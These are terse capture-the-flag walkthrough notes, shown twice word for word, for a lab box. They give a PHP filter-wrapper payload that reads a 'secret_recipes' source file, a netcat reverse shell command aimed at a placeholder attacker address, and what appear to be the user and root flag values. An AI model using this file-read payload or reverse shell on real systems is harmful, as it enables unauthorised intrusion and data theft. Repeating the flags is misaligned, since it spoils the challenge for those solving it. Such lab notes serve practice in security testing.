Simple php injection -
php://filter/convert.base64-encode/resource=secret_recipes
Get a reverse shell and the user flag in /var/www/flag.txt Then /bin/nc ${ATTACKER_IP} 1337 -e /bin/sh to read /root/root.txt
user : sm6uwoe58g root : xbSIEy7Twj
Simple php injection -
php://filter/convert.base64-encode/resource=secret_recipes
Get a reverse shell and the user flag in /var/www/flag.txt Then /bin/nc ${ATTACKER_IP} 1337 -e /bin/sh to read /root/root.txt
user : sm6uwoe58g root : xbSIEy7Twj